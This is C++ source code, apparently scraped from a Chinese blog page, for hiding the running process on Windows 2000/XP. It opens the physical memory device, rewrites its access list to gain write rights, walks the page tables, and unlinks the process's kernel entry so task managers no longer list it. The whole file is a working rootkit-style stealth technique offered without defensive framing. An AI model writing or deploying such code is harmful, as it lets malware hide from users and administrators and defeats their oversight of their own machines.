//
HideProcess.h
BOOL HideProcess();
//
HideProcess.cpp
#include
<
windows.h
>
#include
<
Accctrl.h
>
#include
<
Aclapi.h
>
#include
"
HideProcess.h
"
#define
NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define
STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define
STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;typedef
struct
_IO_STATUS_BLOCK 
...
{
NTSTATUS Status; ULONG Information;
}
IO_STATUS_BLOCK,
*
PIO_STATUS_BLOCK;typedef
struct
_UNICODE_STRING
...
{ USHORT Length; USHORT MaximumLength; PWSTR Buffer;}
UNICODE_STRING,
*
PUNICODE_STRING;
#define
OBJ_INHERIT 0x00000002L
#define
OBJ_PERMANENT 0x00000010L
#define
OBJ_EXCLUSIVE 0x00000020L
#define
OBJ_CASE_INSENSITIVE 0x00000040L
#define
OBJ_OPENIF 0x00000080L
#define
OBJ_OPENLINK 0x00000100L
#define
OBJ_KERNEL_HANDLE 0x00000200L
#define
OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef
struct
_OBJECT_ATTRIBUTES
...
{ ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;}
OBJECT_ATTRIBUTES,
*
POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK
*
ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes );typedef VOID (CALLBACK
*
RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );RTLINITUNICODESTRING RtlInitUnicodeString;ZWOPENSECTION ZwOpenSection;HMODULE g_hNtDLL
=
NULL;PVOID g_pMapPhysicalMemory
=
NULL;HANDLE g_hMPM
=
NULL;OSVERSIONINFO g_osvi;
//
---------------------------------------------------------------------------
BOOL InitNTDLL()
...
{ g_hNtDLL = LoadLibrary("ntdll.dll"); if (NULL == g_hNtDLL) return FALSE; RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); return TRUE;}
//
---------------------------------------------------------------------------
VOID CloseNTDLL()
...
{ if(NULL != g_hNtDLL) FreeLibrary(g_hNtDLL); g_hNtDLL = NULL;}
//
---------------------------------------------------------------------------
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
...
{ PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD); if(ERROR_SUCCESS != dwRes)
...{ if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); 
} EXPLICIT_ACCESS ea; RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl); if(ERROR_SUCCESS != dwRes) ...{ if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } dwRes = SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL); if(ERROR_SUCCESS != dwRes) ...{ if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); }}
//
---------------------------------------------------------------------------
HANDLE OpenPhysicalMemory()
...
{ NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx (&g_osvi); if (5 != g_osvi.dwMajorVersion) return NULL; switch(g_osvi.dwMinorVersion) ...{ case 0: PhyDirectory = 0x30000; break; //2k case 1: PhyDirectory = 0x39000; break; //xp default: return NULL; } RtlInitUnicodeString(&physmemString, L"/Device/PhysicalMemory"); attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); if(status == STATUS_ACCESS_DENIED) ...{ status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); } if(!NT_SUCCESS(status)) return NULL; g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000); if( g_pMapPhysicalMemory == NULL ) return NULL; return g_hMPM;}
//
---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
...
{ ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr; PGDE = BaseAddress[VAddr>>22]; if (0 == (PGDE&1)) return 0; ULONG tmp = PGDE & 0x00000080; if (0 != tmp) ...{ PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF); } else ...{ PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if (0 == (PTE&1)) return 0; PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } return (PVOID)PAddr;}
//
---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
...
{ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (0 == tmp) return 0; ULONG ret = tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret;}
//
---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
...
{ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (0 == tmp) return FALSE; tmp[(phys & 0xFFF)>>2] = data; UnmapViewOfFile(tmp); return TRUE;}
//
---------------------------------------------------------------------------
long
__stdcall exeception(
struct
_EXCEPTION_POINTERS
*
tmp)
...
{ ExitProcess(0); return 1 ;}
//
---------------------------------------------------------------------------
BOOL YHideProcess()
...
{// SetUnhandledExceptionFilter(exeception); if (FALSE == InitNTDLL()) return FALSE; if (0 == OpenPhysicalMemory()) return FALSE; ULONG thread = GetData((PVOID)0xFFDFF124); //kteb ULONG process = GetData(PVOID(thread + 0x44)); //kpeb ULONG fw, bw; if (0 == g_osvi.dwMinorVersion) ...{ fw = GetData(PVOID(process + 0xa0)); bw = GetData(PVOID(process + 0xa4)); } if (1 == g_osvi.dwMinorVersion) ...{ fw = GetData(PVOID(process + 0x88)); bw = GetData(PVOID(process + 0x8c)); } SetData(PVOID(fw + 4), bw); SetData(PVOID(bw), fw); CloseHandle(g_hMPM); CloseNTDLL(); return TRUE;}
BOOL HideProcess()
...
{ static BOOL b_hide = false; if (!b_hide) ...{ b_hide = true; YHideProcess(); return true; } return true;}
4457
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
